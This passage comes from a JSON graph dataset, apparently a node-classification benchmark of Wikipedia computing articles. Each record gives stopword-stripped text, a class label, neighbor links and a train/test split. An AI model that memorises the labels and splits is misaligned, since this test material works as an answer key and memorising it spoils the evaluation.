    "text": "Microsoft_Network_Monitor:microsoft network monitor microsoft network monitor deprecated packet analyzer enables capturing viewing analyzing network data deciphering network protocols used troubleshoot network problems applications network microsoft network monitor 1.0 codenamed bloodhound originally designed developed raymond patch transport protocol network adapter device driver engineer microsoft lan manager development team network monitor replaced microsoft message analyzer lan manager development team one shared hardware-based analyzer time netmon conceived hardware analyzer taken test reproduce networking bug first windows prototype coded christmas holiday first 4 bytes netmon capture file format used validate file values 'rtss ray tom steve steve first four members team code originally written os/2 user interface symbol placed device driver packet buffers kept received data could dumped hex within kernel debugger netmon caused bit stir microsoft since networks e-mail encrypted time software engineers access hardware analyzers due cost netmon many engineers around company access network traffic free request microsoft two simple identification features added non-cryptographic password identification protocol named bloodhound-oriented network entity bone created named raymond patch play codename bloodhound network monitor 3 complete overhaul earlier network monitor 2.x version originally versions network monitor available microsoft products systems management server sms fully featured product public parsers available free download microsoft network monitor superseded microsoft message analyzer key features network monitor 3.4 include following",
    "neighbors": [
      9440,
      10788,
      1064,
      6345,
      842,
      6797,
      7983,
      3250,
      9939,
      6997,
      11221
    ],
    "mask": "Test"
  },
  {
    "node_id": 10706,
    "label": 3,
    "text": "Runahead:runahead runahead technique allows microprocessor pre-process instructions cache miss cycles instead stalling pre-processed instructions used generate instruction data stream prefetches detecting cache misses would otherwise occur using idle execution resources calculate instruction data stream fetch addresses using available information independent cache miss principal hardware cost means checkpointing register file state preventing pre-processed stores modifying memory checkpointing accomplished using little hardware since results computed runahead discarded cache miss serviced time normal execution resumes using checkpointed register file state branch outcomes computed runahead mode saved shift register used highly accurate branch predictor normal operation resumes runahead initially investigated context in-order microprocessor however technique extended use order microprocessors runahead processor detects level one instruction data cache miss records instruction address faulting access enters runahead mode demand fetch missing instruction data cache line generated necessary processor checkpoints register file one several mechanisms discussed later state memory hierarchy checkpointed disabling stores store instructions allowed compute addresses check hit allowed write memory value returned cache miss known ahead time possible pre-processed instructions dependent upon invalid data denoted adding invalid inv bit every register register file runahead initiated load instruction load destination register marked inv processor continues execute instructions miss however results strictly temporary used attempt generate additional load store instruction cache misses turned prefetches designer opt allow runahead skip instructions present instruction cache understanding quality prefetches generated reduced since effect missing instructions unknown registers target instruction one source registers marked inv marked inv allows processor know register values reasonably trusted runahead mode branch instructions resolved due inv sources simply assumed direction predicted correctly branch outcomes saved shift register later use highly accurate predictions normal operation note possible perfectly track inv register values runahead mode required since runahead used optimize performance results computed runahead mode discarded fact impossible perfectly track invalid register values runahead initiated instruction cache miss instruction cache miss occurred runahead load dependent upon store inv address assumes hardware present allow store load forwarding runahead branch outcome runahead dependent upon inv register register file state restored checkpoint processor redirected original faulting fetch address fetch initiated runahead mode serviced obvious method checkpointing register file rf simply perform flash copy shadow register file backup register file brf processor enters runahead mode perform flash copy brf rf normal operation resumes simpler options available one way eliminate flash copy operations write brf rf normal operation read rf normal operation read/write brf runahead mode even aggressive approach eliminate brf rely upon forwarding paths provide modified values runahead mode checkpointing accomplished disabling register file writes modified values runahead mode provided forwarding paths",
    "neighbors": [
      2113,
      7142,
      3175,
      8231,
      1801,
      6926,
      10734,
      2066,
      2226,
      8447
    ],
    "mask": "None"
  },
  {
    "node_id": 10707,
    "label": 4,
    "text": "Shnakule:shnakule shnakule biggest malware network existence averages 2000 hosts many 4357 targets users visiting trusted sites routes malware using relays exploits payload servers continually shifted new domains",
    "neighbors": [
      7515
    ],
    "mask": "Train"
  },
  {
    "node_id": 10708,
    "label": 4,
    "text": "Trend_Micro_Internet_Security:trend micro internet security trend micro internet security known pc-cillin internet security australia virus buster japan antivirus online security program developed trend micro consumer market according nss lab comparative analysis software products market 2014 trend micro internet security fastest responding new internet threats addition anti-malware web threat protection premium version software includes compatibility pcs macs android ios mobile devices parental controls identity theft prevention privacy scanner major social networking sites 25 gb cloud storage features trend micro internet security 2015 include software also includes trend micro premium security includes additional features including av-comparatives awarded trend micro three-star advanced rating–the highest ranking given organization–in av-comparatives ’ whole product dynamic “ real-world ” protection test 2014 av-test october 2014 gave trend micro internet security 2015 score 17 possible 18 points trend micro maximum security scored highest success rate blocking malware downloads nss labs ’ 2014 consumer endpoint protection test focused socially engineered malware results based continuous series tests determine participants ’ effectiveness socially engineered malware nss labs independent network testing facility security consultancy organization nss labs also found trend micro quickest time adding protection unknown threats less 15 minutes january 2016 discovered consumer version trend micro av allowed website visited users execute arbitrary code read browser passwords windows pc purportedly protected patch later issued close issue june 2014 av-test published results mobile security endurance tests assessed 30 apps six-month period trend micro ’ mobile security tied highest overall score 13 13 points previous versions include january 2015 trend micro supported trend micro internet security versions 19/2011 higher pc-cillin 2000 earlier versions virus scanners without additional features pc-cillin 2002 2003 stand-alone virus scanners also included firewall component improved software ’ scanning virus detection engine newer versions trend micro internet security offer additional features spyware protection antispam integrated firewall along improved scanning virus detection engine enhanced heuristics pc-cillin 2003 last stand-alone antivirus product offered trend micro 2007 company released standalone anti-malware product offered protection malicious software including viruses spyware adware",
    "neighbors": [
      2049,
      2563,
      1052,
      550,
      10790,
      2601,
      6699,
      8753,
      569,
      5178,
      7739,
      9279,
      9791,
      10308,
      2118,
      2654,
      8816,
      10872,
      9341,
      127,
      7809,
      131,
      6797,
      1172,
      156,
      2721,
      2213,
      6823,
      3243,
      1708,
      6834,
      704,
      10433,
      7362,
      202,
      4814,
      9423,
      10451,
      1242,
      6364,
      1251,
      5860,
      10987,
      6382,
      8943,
      9971,
      1273,
      9983,
      1792,
      5891,
      8978,
      4374,
      9496,
      6431,
      10531,
      5924,
      1318,
      8998,
      2859,
      3885,
      8493,
      7983,
      4403,
      9523,
      823,
      11577,
      9537,
      1858,
      11073,
      4421,
      1355,
      10574,
      8024,
      4953,
      9048,
      2907,
      9055,
      9569,
      3942,
      11622,
      4464,
      3955,
      4480,
      4994,
      1417,
      3981,
      10637,
      3482,
      1436,
      4511,
      8614,
      8615,
      10166,
      7103,
      5057,
      5069,
      7121,
      2005,
      4568,
      11225,
      8668,
      8170,
      9713,
      6643
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10709,
    "label": 4,
    "text": "Bulk_personal_datasets:bulk personal datasets bulk personal datasets uk government euphemism datasets containing personally identifiable information large number individuals part mass surveillance united kingdom citizens around world term first used publicly march 2015 intelligence security committee parliament subject significant controversy uk government departments programmes utilising bulk personal datasets one care.data programme department health national health service health bulk personal datasets created by-product providing direct care judicial body oversees intelligence services united kingdom investigatory powers tribunal ruled legislative framework united kingdom permit mass surveillance gchq collects analyses data bulk practice mass surveillance special report published intelligence security committee parliament also came view although found past shortcomings oversight said legal framework simplified improve transparency view supported independent reports interception communications commissioner however notable campaign groups broadsheet newspapers continue express strong views contrary others criticised viewpoints turn",
    "neighbors": [
      6344,
      4595,
      2901
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10710,
    "label": 7,
    "text": "Velocify:velocify velocify inc. cloud computing company headquartered el segundo california provides cloud-based intelligent sales automation software designed fast-paced sales environments velocify co-founded 2004 jeff solomon charles chase tony christopoulos company specializing software service saas company raised 3.25m series funding october 2007 rustic canyon partners initial investor may 2011 velocify named nick hedges president chief executive officer 2011 2012 nick hedges named one “ 50 influential sales lead management ” sales lead management association february 2012 velocify completed 15 million series b fundraising round led volition capital participation existing investor rustic canyon partners november 2012 velocify became marketo solution partner company announced changed name velocify leads360 june 19 2013 reflect solutions become vision future october 2017 velocify acquired ellie mae inc. leading cloud-based platform mortgage finance industry velocify offers two products sales automation solution- leadmanager integrated cloud-based dialing solution dial-iq august 2014 company released velocify salesforce offers sales automation dialing solutions within cloud-based crm platform",
    "neighbors": [
      3969,
      10756,
      9771,
      877,
      1970,
      467,
      7515,
      3320,
      2041,
      2075,
      10392
    ],
    "mask": "Test"
  },
  {
    "node_id": 10711,
    "label": 4,
    "text": "Glossary_of_backup_terms:glossary backup terms subject computer backups rife jargon highly specialized terminology page glossary backup terms aims clarify meaning jargon terminology backup policy backup rotation scheme backup site backup software backup window copy backup daily backup data salvaging/recovery differential backup disaster recovery disk cloning disk image full backup hot backup incremental backup media spanning multiplexing multistreaming normal backup near store open file backup remote store restore time retention time site-to-site backup synthetic backup tape library trusted paper key virtual tape library vtl",
    "neighbors": [
      9025,
      3366,
      1801,
      4170,
      3692,
      1358,
      6286,
      9134,
      2322,
      6514,
      11157,
      11581
    ],
    "mask": "None"
  },
  {
    "node_id": 10712,
    "label": 9,
    "text": "EuLisp:eulisp eulisp statically dynamically scoped lisp dialect developed loose formation industrial academic lisp users developers around europe standardizers intended create new lisp less encumbered past compared common lisp minimalist scheme another objective integrate object-oriented programming paradigm well third-generation programming language language definition process first began meeting 1985 paris took several years complete specification first implementation interpreted-only available 1990 main traits lisp-1 separate function variable namespaces common lisp object system clos style generic-function type object-oriented system named eulisp object system telos integrated ground built-in module system defined layers promote use lisp small embedded hardware educational machines supports continuations though powerfully scheme simple lightweight process mechanism threads early implementation eulisp free eventually eulisp feel successor feel youtoo interpreted compiled versions university bath united kingdom interpreter basic level eulisp level-0 written russell bradford xscheme implementation scheme david michael betz originally named euschemeeuscheme recent version renamed euxlisp avoid confusion also eu2c eulisp optimizing compiler created fraunhofer isst apply project germany dialect eulisp developed named plural eulisp eulisp parallel computing programming extensions example use classes algorithm solve towers hanoi problem",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      2585,
      4122,
      4633,
      8226,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      1613,
      9299,
      10841,
      3675,
      11361,
      7267,
      2660,
      8293,
      2666,
      5751,
      7805,
      9345,
      1159,
      9865,
      9877,
      5803,
      2225,
      6840,
      7867,
      4799,
      7880,
      8908,
      205,
      5837,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      4846,
      5360,
      5361,
      9969,
      8435,
      9975,
      6906,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      10510,
      1301,
      791,
      10012,
      3869,
      2335,
      2849,
      3876,
      7981,
      7983,
      2352,
      10547,
      823,
      311,
      6969,
      4410,
      3408,
      6994,
      1365,
      2392,
      10083,
      6502,
      11625,
      3446,
      10104,
      377,
      4992,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      8627,
      5564,
      7616,
      5569,
      6594,
      4550,
      11218,
      11221,
      3034,
      3051,
      5611,
      9714,
      7670,
      11255
    ],
    "mask": "Test"
  },
  {
    "node_id": 10713,
    "label": 8,
    "text": "SEMrush:semrush semrush software service saas company based boston sells online visibility marketing analytics software subscriptions founded oleg shchegolev dmitry melnikov seo tool browser extension adopting saas model software provides intelligence data including website traffic information keywords projected adwords spend site audit topic research lead generation seo-related data company customers include ebay quora booking.com hewlett packard enterprise bnp paribas oleg shchegolev dmitry melnikov started seo enthusiasts interested industry developments new technologies wanted build tool could identify market trends best industry practices sharing first findings friends local influencers people curious started using daily word mouth tool started increasing popularity community influencers grew result software first launched seodigger launched firefox extension subsequently renamed seoquake company 2007 eventually semrush 400 employees offices boston philadelphia czech republic cyprus russia 2016 reached milestone 1,000,000 users clients 100 countries april 2018 company received 40m usd funding round co-led venture capital firms greycroft e.ventures siguler guff expansion various search platforms including owned amazon microsoft baidu",
    "neighbors": [
      1638,
      3688,
      8639,
      467,
      5524,
      5078,
      8921,
      735
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10714,
    "label": 2,
    "text": "BeeSafe:beesafe beesafe personal safety mobile app launched 2015 slovak startup location-based next generation security service notifies family members friends case user app gets danger app received numerous awards app 700 downloads 250 active logins 60 countries worldwide beesafe founded march 20 2015 peter stražovec michal kačerík project winner žilina ’ startup weekend 2013 startupawards.sk 2015 finalist later app released android ios marketplace whole beesafe project spot booster incubator bratislava three months beesafe entered agreement city piešťany november 2015 increase security citizen connecting mobile app police platform first city started using beesafe platform application tries help people slovak cities cities see users danger beesafe next generation corporate personal emergency app tracking application neither panic button application user ’ press panic button process help call fully automated beesafe app includes silent alarm system system trigger alarm notify user ’ family friends security service police user dangerous situation available android apple smartphones smart devices b beesafe app received via bona award winner slovak startup nominations",
    "neighbors": [
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 10715,
    "label": 3,
    "text": "Mini-ITX:mini-itx mini-itx motherboard developed via technologies 2001 commonly used small-configured computer systems originally niche product designed fan-less cooling low power consumption architecture made useful home theater pc systems fan noise detract cinema experience four mounting holes mini-itx board line four holes atx-specification motherboards locations backplate expansion slot though one holes used optional earlier versions atx spec mini-itx boards therefore often used cases designed atx micro-atx atx variants desired design provides one expansion slot earlier motherboards conventionally standard 33 mhz 5v 32-bit pci slot many older case designs use riser cards even two-slot riser cards although two-slot riser cards compatible boards boards based around non-x86 processors 3.3v pci slot mini-itx 2.0 2008 boards pci-express ×16 slot boards compatible standard pci riser cards supplied older itx cases march 2001 chipset manufacturer via technologies released reference design itx motherboard promote low power c3 processor bought centaur technology combination chipsets designed robert kuo via chief r expert 215×191 mm vt6009 itx reference board demonstrated information pc set-top box configurations later designed mini-itx specification point manufacturers took itx design shuttle jetway etc produced many itx based cube computers manufactures instead produced smaller boards based similar 229×191 mm flexatx configuration october 2001 via announced decision create new motherboard division provide standardized infrastructure lower-cost pc iterations focus embedded devices result november 2001 release vt6010 mini-itx reference design touted information pc low cost entry level x86 computing platform manufacturers still reluctant customer response much receptive via decided manufacture sell boards april 2002 first mini-itx motherboards—via epia 5000 fanless 533 mhz eden processor epia 800 800 mhz c3 —were sold industrial customers enthusiasts soon noticed advantages small size low noise power consumption started push boundaries case modding something else—building computers nearly every object imaginable sometimes even creating new cases altogether hollowed vintage computers humidors toys electronics musical instruments even 1960s-era toaster become homes relatively quiet even silent mini-itx systems capable many tasks modern desktop pc mini-itx boards primarily appeal industrial embedded pc markets majority sold bulk components integrated finished system single-purpose computing applications produced much longer sales life-cycle consumer boards original epias still available quality industrial users typically require manufacturers prototype using standard cases power supplies build enclosures volumes get high enough typical applications include playing music supermarkets powering self-service kiosks driving content digital displays via continues expand mini-itx motherboard line earlier generations included original pl133 chipset boards dubbed classic boards cle266 chipset boards adding mpeg-2 acceleration cn400 boards added mpeg-4 acceleration second generation boards featured epia mii cl pd tc ms — tailored slightly different markets legacy via boards use x86-compatible cpus — c3 c7 low-power eden variants newer boards featuring via nano cpu launched may 2008 manufacturers also produced boards designed around layout using via also intel amd transmeta powerpc technology intel introduced line mini-itx boards atom cpu demonstrates significant increase processing performance without added power consumption older via c3 c7 offerings helps make design viable personal computers manufacturers saw potential design followed suit even limiting atom evidenced zotac geforce 9300-itx board supports core 2 duo cpus fsb frequencies 1333 mhz two separate-channeled 800 mhz memory slots fully functional pci express 2.0 x16 slot could connect sli onboard video new wave offerings made mini-itx much popular among home users hobbyists even overclockers intel currently one mini-itx mainboard manufacturers list mechanical dimensions manuals number manufacturers released mini-itx motherboards feature embedded cpus often mobile low-tdp versions processors designed draw minimal power resulting lower tdp ideal fanless passively cooled configurations embedded applications starting lga 775 socketed intel mini-itx motherboards released intel zotac followed lga 1156 motherboards starting lga 1155 mini-itx motherboards started become mainstream many different manufacturers releasing products partly almost sandy bridge ivy bridge intel celeron pentium core series cpus integrated processor graphics eliminating need motherboard graphics discrete graphics cards trend continues lga 1150 lga 1151 cpus due limitations mini-itx design physical size lga 2011 socket mini-itx motherboards socket support single pci express expansion slot require using narrow-ilm version lga 2011 socket despite manufacturers released lga 2011 based mini-itx motherboards also mini-itx motherboards lga 2066 socket released four sodimm slots number manufacturers released several socketed amd mini-itx motherboards supporting socket am2 socket am2+ socket am3 socket fm1 socket fm2 socket fm2+ socket am1 socket am4 cpus socket am2+ am3 itx motherboards integrated motherboard graphics discrete graphics processor integrated graphics required platforms mini-itx motherboards integrated amd cpus also released motherboards often use mobile cpus passive cooling feature powerful integrated graphics compared intel counterparts makes suitable htpc ibase made first transmeta-based mini-itx motherboard mb860 board uses transmeta™ efficeon™ processors run 1.2 ghz supports sodimm ddr modules capacities 1 gb onboard 16 mb ati m7 graphics controller supports 3d games graphical intensive programs provides four usb 2.0 ports realtek 8100c 10/100mbit/s baset ethernet optional 8110s gigabit ethernet controller first powerpc motherboards produced eyetech 2005 stopped activity 2005 company acube systems made new board sam440ep primarily amigaos market cadia networks developed mini itx arm board comes arm cortex-a8 freescale i.mx53 series cpu according official website board offers ultra-low power soc variety i/o os support android linux2.6 windows embedded compact 7 kontron also developed mini itx arm board according website features arm cortex-a9 quad core 900mhz processor neon technology nvidia graphics processor 2 gb ram targeted power consumption 7w entire board appliedmicro offers xc-1 server development platform motherboard uses x-gene armv8 system chip 8 2.4 ghz cpu cores supports 128 gb ddr3 dram using 16 gb dimms baseboard management controller mini-itx standard define standard computer power supply though suggests possible options conventionally mini-itx boards use 20- 24-pin original atx power connector usually connected dc-dc converter board connects external power adapter generally vendors provide power adapter dc-dc board case boards built dc-dc converters converters also made plug directly atx connector e.g picopsu either options avoids need mount separate dc-dc converter case saving space design effort boards using full-power intel amd cpus typically use atx12v 2.x connections require case appropriate power supply cooling power-hungry chips defined atx specification power supplies atx12v connector separate 12 volts rail must idle 12 volts rail",
    "neighbors": [
      6804,
      10260,
      4886,
      8855,
      11417,
      8730,
      9122,
      10019,
      3883,
      11183,
      8627,
      8629,
      7105,
      10945,
      2500,
      9157,
      455,
      7113,
      8394,
      3403,
      7247,
      5073,
      9945,
      6618,
      9307,
      3037,
      2525,
      10337,
      4451,
      5859,
      8552,
      1260,
      4334,
      7151,
      10095,
      2161,
      499,
      2803,
      4217,
      9851,
      8700
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10716,
    "label": 0,
    "text": "Babelfy:babelfy babelfy software algorithm disambiguation text written language specifically babelfy performs tasks multilingual word sense disambiguation i.e. disambiguation common nouns verbs adjectives adverbs entity linking i.e disambiguation mentions encyclopedic entities like people companies places etc. babelfy based babelnet multilingual semantic network performs disambiguation entity linking three steps result text written 271 languages supported babelnet output possibly overlapping semantic annotations",
    "neighbors": [
      1890,
      396,
      8262,
      5778
    ],
    "mask": "Test"
  },
  {
    "node_id": 10717,
    "label": 4,
    "text": "ISACA:isaca isaca international professional association focused governance irs filings known information systems audit control association although isaca goes acronym isaca originated united states 1967 group individuals working auditing controls computer systems started become increasingly critical operations organizations identified need centralized source information guidance field 1969 stuart tyrnauer employee douglas aircraft company incorporated group edp auditors association edpaa tyrnauer served body founding chairman first three years 1976 association formed education foundation undertake large-scale research efforts expand knowledge value accorded fields governance control information technology association became information systems audit control association 1994 march 2016 isaca bought cmmi institute behind capability maturity model integration isaca currently serves 110,000 constituents members professionals holding isaca certifications 180 countries job titles members auditor consultant educator security professional regulator chief information officer chief information security officer internal auditor work nearly industry categories network isaca chapters 200 chapters established 80 countries chapters provide education resource sharing advocacy networking benefits csx-p isaca first cybersecurity certification introduced summer 2015 one certifications require individual work live environment real problems obtain certification specifically exam puts test takers live network real incident taking place student efforts respond incident fix problem results type score awarded",
    "neighbors": [
      5636,
      9607,
      7692,
      5752,
      2190,
      399,
      8462,
      5010,
      11159,
      3994,
      10398,
      1312,
      11567,
      10940,
      5699,
      10307,
      1479,
      4936,
      1493,
      3552,
      357,
      3447,
      6648,
      5373
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10718,
    "label": 4,
    "text": "Information_Technology_Security_Assessment:information technology security assessment information technology security assessment security assessment explicit study locate security vulnerabilities risks assessment assessor full cooperation organization assessed organization grants access facilities provides network access outlines detailed information network etc parties understand goal study security identify improvements secure systems assessment security potentially useful security tests goal security assessment also known security audit security review network assessment ensure necessary security controls integrated design implementation project properly completed security assessment provide documentation outlining security gaps project design approved corporate security policies management address security gaps three ways management decide cancel project allocate necessary resources correct security gaps accept risk based informed risk reward analysis following methodology outline put forward effective means conducting security assessment security assessment report include following information security risk assessments like many risk assessments actually quantitative represent risk actuarially-sound manner measuring risk quantitatively significant impact prioritizing risks getting investment approval quantitative risk analysis applied security major us government study 2000 federal cio council commissioned study 100 million security investment department veterans affairs results shown quantitatively united states department veterans affairs common vendor-neutral professional certifications performing security assessment casas iii victoriano 2006 information security risk assessment model public university administrators applied research project texas state university http //ecommons.txstate.edu/arp/109/",
    "neighbors": [
      10307,
      5636,
      3887,
      1907,
      7989,
      7352,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10719,
    "label": 7,
    "text": "Apache_Ambari:apache ambari apache ambari software project apache software foundation ambari enables system administrators provision manage monitor hadoop cluster also integrate hadoop existing enterprise infrastructure ambari sub-project hadoop top-level project right ambari used companies including ibm hortonworks cardinal health ebay expedia kayak.com lending club neustar macy pandora radio samsung shutterfly spotify",
    "neighbors": [
      3462,
      10377,
      8460,
      7567,
      1296,
      6161,
      1047,
      8217,
      11161,
      6555,
      8860,
      3877,
      10661,
      11303,
      5677,
      1327,
      7983,
      4919,
      5047,
      4538,
      1851,
      6074,
      7485,
      7742,
      9789,
      7233,
      6338,
      4419,
      1222,
      1991,
      4294,
      7750,
      5066,
      8139,
      4944,
      1363,
      5332,
      8408,
      9179,
      7261,
      990,
      8799,
      865,
      11235,
      8294,
      11111,
      8425,
      8554,
      747,
      5612,
      8810,
      2163,
      6774,
      7159,
      1913,
      1018,
      3323
    ],
    "mask": "Train"
  },
  {
    "node_id": 10720,
    "label": 9,
    "text": "Speedcoding:speedcoding speedcoding speedcode first high-level programming language created ibm computer language developed john backus 1953 ibm 701 support computation floating point numbers high level means symbolic aiming natural language expressivity goal opposed machine hardware instruction oriented coding idea arose difficulty programming ibm ssec machine backus hired calculate astronomical positions early 1950 speedcoding system interpreter focused ease use expense system resources provided pseudo-instructions common mathematical functions logarithms exponentiation trigonometric operations resident software analyzed pseudo-instructions one one called appropriate subroutine speedcoding also first implementation decimal input/output operations although substantially reduced effort writing many jobs running time program written help speedcoding usually ten twenty times machine code interpreter took 310 memory words 30 memory available 701",
    "neighbors": [
      477,
      9345,
      7076,
      9804,
      9330,
      3960,
      8502,
      1976,
      7421,
      3323,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10721,
    "label": 7,
    "text": "Nordic_Data_Grid_Facility:nordic data grid facility nordic data grid facility ndgf common e-science infrastructure provided nordic countries denmark finland norway sweden iceland scientific computing data storage first far internationally distributed wlcg tier1 center providing computing storage services experiments cern nordic data grid facility traces history back end-2001 intrinsically related nordugrid project success latter indicated need larger pan-nordic facility storage resources high priority need addressed establishing pilot ndgf infrastructure operational 2002-2005 provided distributed storage addition nordugrid computing resources phase ndgf committed provide nordic tier1 regional computing center worldwide lhc computing grid project cern specifics tier1 internationally distributed facility nordic data grid facility present function provider nordic grid infrastructure established april 2006 nordic research councils came operation june 1 2006 initial priority live original commitment establishing nordic tier1 traditional focus storage facilities ndgf team includes software experts take part various grid middleware development 2012 ndgf became part wider initiative nordic e-infrastructure collaboration ndgf tier1 production grid facility leverages existing national computational resources grid infrastructures qualify support research groups form virtual organization vo vo provides compute resources sharing ndgf tier1 operates grid interface sharing resources currently computational resources ndgf tier1 accessible arc middleware resources also available via alien software distributed storage facility realised dcache storage management solution today dominant user community ndgf tier1 high energy physics alice atlas cms virtual organizations operation nordic tier1 together tier0 cern 12 tier1s collects stores processes data produced large hadron collider cern since 2010 ndgf tier1 part european grid infrastructure ndgf tier1 hosted nordunet 2006-2011 since 2012 hosted nordforsk many confuse ndgf nordugrid surprising especially since second phase ndgf proposed assume name nordugrid however decided distinguish mostly development-oriented project nordugrid mostly operations-oriented one ndgf rule thumb ndgf provides mostly services nordugrid provides mostly arc middleware",
    "neighbors": [
      2129,
      11658,
      5956,
      198
    ],
    "mask": "None"
  },
  {
    "node_id": 10722,
    "label": 5,
    "text": "Netscape_Navigator_9:netscape navigator 9 netscape navigator 9 discontinued web browser produced netscape communications division parent aol first announced january 23 2007 ninth major release netscape line browsers aol outsourced development netscape browser 8 mercurial communications 2004 netscape navigator 9 marked first netscape browser produced in-house since netscape 7 suite also saw return classic navigator name previously used netscape heyday versions 1.0 4.08 1990s netscape navigator 9 based mozilla firefox 2.0 program first beta released june 5 2007 beta 2 july 12 beta 3 august 16 release candidate final release issued october 15 2007 december 28 2007 netscape developers announced aol would discontinue web browser february 1 2008 january 28 2008 netscape revised date march 1 2008 offered support migration flock mozilla firefox last web browser netscape series beta releases netscape navigator 9 included enhanced newsfeed support integrated netscape.com internet portal including enhanced methods discussion submission voting web pages however starting netscape navigator 9 beta 3 netscape.com integration optional certain aspects integration could manually enabled disabled integration totally removed navigator 9.0rc1 portal relaunched propeller user interface program also updated theme also later released use mozilla firefox like netscape version 8.x navigator 9 based upon mozilla firefox time version 2.0 full support firefox add-ons plugins netscape providing netscape also released features extensions firefox including site mail notifier friends activity sidebar digg tracker well netstripe new default theme netscape 9 browser also included url self-correction corrected common url misspellings improved ftp listing interface dedicated news menu integration netscape.com news portal quick link pad also included web pages could quickly added pad later viewing without adding bookmark lists navigator 9 also sees browser return multi-platform support across windows linux mac os x. netscape signature splash screen also reappeared release candidate final program unlike netscape 8 browser use internet explorer trident layout engine alternative engine option netscape navigator include newsgroup instant messaging email clients netscape 6 7 netscape however plan produce companion email client complement navigator confirmed netscape messenger 9 software development netscape advised users use netscape 7 series suites includes email client alongside navigator 9 browsing purposes new verse 8:20 easter egg book mozilla written release netscape 9 consisting thus creator looked upon beast reborn saw good could reference either re-development netscape in-house mozilla foundation contributors based user feedback netscape decided return splash screen navigator 9 september 10 2007 netscape decided give design team break let users submit idea splash screen look winning image would used splash screen final 9.0 release navigator designer would listed browser credits many designs submitted end mario herbert chosen winner design used final navigator 9 splash screen cnet download.com claimed navigator 9 neat components contained many tricks love backup browser previously used describe browser 8 bundled features version 8 removed",
    "neighbors": [
      6657,
      9736,
      2579,
      6171,
      2076,
      9757,
      7713,
      3110,
      10791,
      9770,
      559,
      4661,
      3639,
      64,
      9281,
      5707,
      10834,
      5205,
      6231,
      8281,
      6747,
      4189,
      6237,
      106,
      1642,
      9834,
      115,
      9843,
      3191,
      4728,
      637,
      1664,
      6791,
      6797,
      11418,
      10910,
      8351,
      7340,
      1713,
      9908,
      7861,
      11449,
      4797,
      7364,
      11466,
      7885,
      7889,
      4310,
      2777,
      8923,
      737,
      4326,
      9451,
      11000,
      8443,
      7943,
      1295,
      7951,
      2836,
      10006,
      7965,
      7455,
      8994,
      1834,
      823,
      7488,
      10057,
      10060,
      2893,
      10078,
      8557,
      7543,
      3961,
      6528,
      3971,
      3462,
      8584,
      4490,
      6028,
      10126,
      7572,
      5026,
      4013,
      5054,
      10174,
      9152,
      4048,
      5078,
      482,
      5605,
      487,
      488,
      8169,
      494,
      1520,
      7152,
      6133,
      5114,
      6143
    ],
    "mask": "None"
  },
  {
    "node_id": 10723,
    "label": 5,
    "text": "Reverse_Address_Resolution_Protocol:reverse address resolution protocol reverse address resolution protocol rarp obsolete computer networking protocol used client computer request internet protocol ipv4 address computer network available link layer hardware address mac address client broadcasts request need prior knowledge network topology identities servers capable fulfilling request rarp described internet engineering task force ietf publication rfc 903 rendered obsolete bootstrap protocol bootp modern dynamic host configuration protocol dhcp support much greater feature set rarp rarp requires one server hosts maintain database mappings link layer addresses respective protocol addresses media access control mac addresses need individually configured servers administrator rarp limited serving ip addresses reverse arp differs inverse address resolution protocol inarp described rfc 2390 designed obtain ip address associated local frame relay data link connection identifier inarp used ethernet although original uses rarp overcome different protocols modern day protocols use rarp examples cisco overlay transport virtualization otv rarp used update layer 2 forwarding tables mac address moves data centers",
    "neighbors": [
      10242,
      3847,
      649,
      9868,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      562,
      2996,
      9909,
      10171,
      4797,
      5181,
      3133,
      3006,
      5437,
      7364,
      2887,
      8265,
      2509,
      4687,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      3297,
      10341,
      10344,
      11112,
      7278,
      367,
      8432,
      7411,
      6651
    ],
    "mask": "Test"
  },
  {
    "node_id": 10724,
    "label": 0,
    "text": "Linguee:linguee linguee web service provides online dictionary number language pairs unlike similar services leo linguee incorporates search engine provides access large amounts bilingual sentence pairs found online translation aid linguee therefore differs machine translation services like babelfish similar function translation memory linguee uses specialized webcrawlers search internet appropriate bilingual texts divide parallel sentences paired sentences identified undergo automatic quality evaluation human-trained machine learning algorithm estimates quality translation user set number pairs using fuzzy search access ranking search results previous quality assurance compliance influenced search term users also rate translations manually machine learning system trained continuously addition serving bilingual web patent translated texts well eu parliament protocols laws european union eur-lex sources addition officially translated text eu sources french language service relies translated texts canadian government documents websites transcripts along canadian national institutions organisations often provide bilingual services according operator linguee offers access approximately 100 million translations concept behind linguee conceived fall 2007 former google employee dr. gereon frahling developed following year along leonard fink business idea recognized 2008 main prize competition founded federal ministry economics technology germany april 2009 web service available public linguee operated deepl gmbh formerly linguee gmbh based cologne august 2017 linguee team publicly announced launch deepl translator freely available translation service capable translating seven major european languages",
    "neighbors": [
      113,
      6655
    ],
    "mask": "Test"
  },
  {
    "node_id": 10725,
    "label": 3,
